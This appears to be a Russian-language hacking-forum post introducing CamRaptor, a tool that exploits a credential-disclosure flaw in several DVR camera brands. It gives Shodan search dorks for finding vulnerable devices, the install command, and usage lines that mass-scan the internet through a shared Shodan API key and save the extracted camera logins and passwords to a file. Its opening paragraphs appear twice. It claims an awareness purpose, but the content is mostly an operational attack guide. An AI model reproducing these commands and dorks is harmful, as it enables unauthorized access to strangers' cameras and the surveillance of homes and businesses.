Привет, друг. Сегодня я хочу рассказать про такой тип уязвимости, как раскрытие данных авторизации, ее также можно отнести к уязвимости чтения конфигурации. Многие скажут что в современных системах видеонаблюдения не может такого быть, но поверьте мне, очень многие тупо игнорируют обновления прошивки.
Итак, есть инструмент, нацеленный на то, чтобы эксплойтировать данную уязвимость в популярных DVR камерах, вот их список:
Заманчиво, не так ли? Что же, наверно стоит приступить к практической части и рассказать как можно выявить эту уязвимость в свой домашней камере или просто просканировать просторы интернета на поиск уязвимостей.
Для таких целей существует инструмент CamRaptor, он вышел совсем недавно, но его функционал уже может быть использован для таких целей, вот его исходный код и документация: EntySec CamRaptor
Перейдем непосредственно к установке
После того как пакет установится, можно посмотреть перечень его возможностей через флаг
Вот его основные опции:
Одна их них оказалась уязвима и инструмент сумел достать логин и пароль от камеры.
Из того, какое количество уязвимых устройств насчитал Shodan и то, что такие камеры могут встречаться в магазинах, домах, ресторанах и других местах, можно сделать вывод что люди так и не научились следить за безопасностью. Цель этой статьи даже не обзор инструмента, а просто мысль о том что за безопасностью надо следить, иначе ваши камеры превращаются из устройств наблюдения за помещением, в устройства наблюдения за вами.
Итак, есть инструмент, нацеленный на то, чтобы эксплойтировать данную уязвимость в популярных DVR камерах, вот их список:
- Novo
- CeNova
- QSee
- Pulnix
- XVR 5 in 1
- Securus
- Night OWL
- DVR Login
- HVR Login
- MDVR Login
Ссылка скрыта от гостей
), я привел пару дорков, которые помогут вам отыскать уязвимые устройства:- "Server: GNU rsp/1.0"
- "DVR Login"
- "HVR Login"
- "MDVR Login"
- "XVR Login"
- html:"/login.rsp"
Заманчиво, не так ли? Что же, наверно стоит приступить к практической части и рассказать как можно выявить эту уязвимость в свой домашней камере или просто просканировать просторы интернета на поиск уязвимостей.
Для таких целей существует инструмент CamRaptor, он вышел совсем недавно, но его функционал уже может быть использован для таких целей, вот его исходный код и документация: EntySec CamRaptor
Перейдем непосредственно к установке
pip3 install git+https://github.com/EntySec/CamRaptor
После того как пакет установится, можно посмотреть перечень его возможностей через флаг
-h
.Вот его основные опции:
-t
- запустить эксплуатацию потоками (на каждую камеру один поток, это ускоряет работу эксплойта)-o
- записать пароль(пароли) камер(ы) в файл (очень полезно когда используешь потоки, чтобы не искать пароли в терминале, можно просто записать их в файл)-i
- просто проверить и достать пароли из всех камер в файле.-a
- проверить один адрес на наличие уязвимости и вытащить пароль.--api
- просканировать интернет на наличие уязвимых камер и достать из них пароли (через Shodan). Для этой опции понадобится ваш ключ аккаунта Shodan, однако ребята EntySec не просто написали инструмент, но еще и предоставили свой ключ, которого хватит на всех.
camraptor -a <address>
- просто достать пароль из одной камеры. Формат адреса - айпи:портcamraptor -t --api PSKINdQe1GyxGgecYz2191H2JoS9qvgD -o passwords.txt
- используя ключ Shodan (мы возьмем ключ, который нам предоставили ребята из EntySec) проверить камеры из глобальной сети потоками и записать пароли в файл.camraptor -t -i cameras.txt -o passwords.txt
- потоками проверить камеры из списка и записать пароли в файл.
Одна их них оказалась уязвима и инструмент сумел достать логин и пароль от камеры.
Из того, какое количество уязвимых устройств насчитал Shodan и то, что такие камеры могут встречаться в магазинах, домах, ресторанах и других местах, можно сделать вывод что люди так и не научились следить за безопасностью. Цель этой статьи даже не обзор инструмента, а просто мысль о том что за безопасностью надо следить, иначе ваши камеры превращаются из устройств наблюдения за помещением, в устройства наблюдения за вами.
Последнее редактирование: